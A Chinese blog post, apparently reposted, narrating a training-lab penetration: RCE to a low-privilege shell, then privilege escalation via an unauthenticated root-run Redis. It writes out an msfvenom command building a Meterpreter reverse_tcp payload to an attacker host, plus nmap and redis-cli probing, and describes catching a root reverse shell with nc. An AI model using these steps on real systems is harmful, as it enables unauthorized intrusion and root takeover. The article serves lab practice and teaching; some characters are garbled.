linux另类提权之打靶归来(2019年老文)
0x00前言:
本次目標(biāo)為滲透某安全培訓(xùn)學(xué)校在線靶場(chǎng),朋友做不出來(lái)交幫忙看下。。。
不要聽見靶場(chǎng)就關(guān)閉了此文,客官往下看。
0x01開端
打開此靶機(jī)各種琳瑯滿目的漏洞讓我眼花繚亂,這里我選擇一種直擊要害的漏洞作為開端,R…C…E…
人狠話不多,直接彈。
收到shell權(quán)限較吊毛…就是個(gè)www
.
發(fā)現(xiàn)shell沒(méi)有任何權(quán)限,無(wú)法對(duì)文件進(jìn)行更改和寫入。只能對(duì)上傳目錄有寫入權(quán)限
于是find -user www。
上傳目錄通過(guò)web訪問(wèn)是沒(méi)有權(quán)限訪問(wèn)的,訪問(wèn)uploads目錄會(huì)直接跳轉(zhuǎn)404頁(yè)面。其實(shí)上傳上PHP馬也沒(méi)什么卵用。
內(nèi)核打了一圈也沒(méi)辦法提權(quán),像我也沒(méi)得0day…哭廖。
0x02信息搜集
沒(méi)辦法不能走內(nèi)核提權(quán),就開始收集信息看看能不能進(jìn)行環(huán)境變量,SUID,符號(hào)鏈接等提權(quán)。
當(dāng)我執(zhí)行ps -fu root 命令時(shí).眼前一亮
root權(quán)限運(yùn)行的redis臥槽有搞頭,不過(guò)不能外連。
0x003安排走起
現(xiàn)在需要把6379端口轉(zhuǎn)發(fā)出來(lái),我決定用msf進(jìn)行端口轉(zhuǎn)發(fā)
拿msf生成linux遠(yuǎn)控
msfvenom-p linux/x86/meterpreter/reverse_tcp LHOST=攻擊機(jī)ip LPORT=8000 -f elf >shell.elf
但是問(wèn)題又來(lái)了,目前的權(quán)限不能執(zhí)行wget等遠(yuǎn)程下載操作。。
這里我們通過(guò)上傳漏洞將elf文件上傳到服務(wù)器。
我們CD到上傳目錄準(zhǔn)備執(zhí)行遠(yuǎn)控。
msf配置好接受會(huì)話
接下來(lái)進(jìn)行端口轉(zhuǎn)發(fā)
0x04漏洞利用
nmap -A -p 6699 -script redis-info127.0.0.1 對(duì)其進(jìn)行探測(cè)得知存在未授權(quán)。
./redis-cli -h 127.0.0.1 -p 6699 //鏈接redis
我不準(zhǔn)備寫ssh的公私鑰了,直接進(jìn)行彈shell。
本人親測(cè)寫ssh公私匙不穩(wěn)定
我們現(xiàn)在VPS上使用nc監(jiān)聽4445端口。
redis執(zhí)行:
成功彈回root權(quán)限的shell~
歡迎各位大佬評(píng)論交流
有技術(shù)交流或滲透測(cè)試培訓(xùn)需求的朋友歡迎聯(lián)系QQ/VX-547006660,需要代碼審計(jì)、滲透測(cè)試、紅藍(lán)對(duì)抗網(wǎng)絡(luò)安全相關(guān)業(yè)務(wù)可以看置頂博文
2000人網(wǎng)絡(luò)安全交流群,歡迎大佬們來(lái)玩
群號(hào)820783253
總結(jié)
以上是生活随笔為你收集整理的linux另类提权之打靶归来(2019年老文)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 泰州职业技术学院 计算机专业,泰州职业技
- 下一篇: linux远程灰屏,Ubuntu 15.